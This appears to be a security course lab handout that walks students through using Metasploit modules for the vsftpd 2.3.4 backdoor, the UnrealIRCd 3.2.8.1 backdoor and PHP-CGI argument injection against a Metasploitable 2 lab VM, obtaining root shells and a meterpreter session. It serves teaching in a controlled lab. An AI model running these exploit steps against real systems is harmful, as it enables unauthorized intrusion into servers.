Start your Metasploitable 2 VM and log in as msfadmin with the password msfadmin
Execute the ifconfig command on both machines and ping from one to the other. Make sure you get replies, as shown below.
In Kali, execute this command to open Metasploit.
msfconsole
At the "msf>" prompt,
execute this command.
search vsftpd
As shown below, one exploit is found.
Execute these commands:
use exploit/unix/ftp/vsftpd_234_backdoor
show options
As shown below,
the only required parameter
is RHOST, the IP address of the
target system.
Execute these commands, replacing the IP address with the IP address of your Metasploitable 2 VM.
set RHOST 172.16.1.190
exploit
As shown below,
a command shell session
opens. Execute the
whoami command to see the
reply root.
Capture a whole-desktop image and save it as "Proj 6a".
YOU MUST SEND IN A WHOLE-DESKTOP IMAGE FOR FULL CREDIT In Kali, execute these commands to exit the shell and Metasploit.
exit
exit
In Kali, execute this command to open Metasploit.
msfconsole
At the "msf>" prompt,
execute this command.
search unreal
As shown below, one exploit is found.
Execute these commands:
use exploit/unix/irc/unreal_ircd_3281_backdoor
show options
As shown below,
the only required parameter
is RHOST, the IP address of the
target system.
Execute these commands, replacing the IP address with the IP address of your Metasploitable 2 VM.
set RHOST 172.16.1.190
exploit
As shown below,
a command shell session
opens. Execute the
whoami command to see the
reply root.
Capture a whole-desktop image and save it as "Proj 6b".
YOU MUST SEND IN A WHOLE-DESKTOP IMAGE FOR FULL CREDIT Press Ctrl+C to cancel the session.
In Kali, execute these commands to exit the shell and Metasploit.
y
exit
A Web page opens, as shown below.
Click the phpMyAdmin link.
Append this to the end of the URL, and press Enter.
?-s
The source code of the Web
page appears, as shown below.
This is a known bug in PHP-CGI, and it allows us to get remote code execution with Metasploit.
In Kali, execute this command to open Metasploit.
msfconsole
At the "msf>" prompt,
execute this command.
search php_cgi
As shown below, one exploit is found.
Execute these commands:
use exploit/multi/http/php_cgi_arg_injection
show options
As shown below,
the only required parameter
is RHOST, the IP address of the
target system.
Execute these commands, replacing the IP address with the IP address of your Metasploitable 2 VM.
set RHOST 172.16.1.190
exploit
As shown below,
a meterpreter session
opens.
Troubleshooting
If you are using Kali 2017.2, this exploit fails, and you get the message "Meterpreter session closed ... reason: died" message, as shown below. This seems to be a bug in Kali. Just turn in that image and I'll accept it.
![]()
Execute these commands to see system information and your user ID. You are "www-data", which is a low-privilege account. To get root access, you need another exploit, as discussed here.
sysinfo
getuid
Capture a whole-desktop image and save it as "Proj 6c".
YOU MUST SEND IN A WHOLE-DESKTOP IMAGE FOR FULL CREDIT
Send a Cc to yourself.
Hacking Unreal IRCd 3.2.8.1 on Metasploitable 2
https://community.rapid7.com/docs/DOC-1875
Last Modified: 10-12-17 9 pm